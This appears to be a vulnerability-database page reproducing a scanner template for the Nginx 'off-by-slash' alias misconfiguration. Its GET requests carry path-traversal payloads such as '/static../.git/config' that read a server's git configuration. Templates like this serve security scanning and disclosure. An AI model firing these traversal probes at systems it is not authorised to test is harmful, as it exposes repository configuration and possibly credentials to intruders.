git-config-nginxoffbyslash: Nginx - Git Configuration Exposure

2025-08-01 git-config-nginx PoC Public

Description

Nginx is vulnerable to git configuration exposure.

PoC

id: git-config-nginxoffbyslash

info:
  name: Nginx - Git Configuration Exposure
  author: organiccrap
  severity: medium
  description: Nginx is vulnerable to git configuration exposure.
  reference:
    - https://beaglesecurity.com/blog/vulnerability/nginx-off-by-slash-exposes-git-config.html
    - https://twitter.com/Random_Robbie/status/1262676628167110656
    - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-23
  metadata:
    max-request: 10
  tags: config,exposure,nginx,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/static../.git/config'
        - '/js../.git/config'
        - '/images../.git/config'
        - '/img../.git/config'
        - '/css../.git/config'
        - '/assets../.git/config'
        - '/content../.git/config'
        - '/events../.git/config'
        - '/media../.git/config'
        - '/lib../.git/config'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - '[core]'
# digest: 4b0a00483046022100f535984f49cc6781cc2a7c828b5a99069999ca26e14d1f0696960c1296d64768022100da32adb739fa52cdabf58664f36f8b5ebe498656e67742d999ff9c1f1eed07aa:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities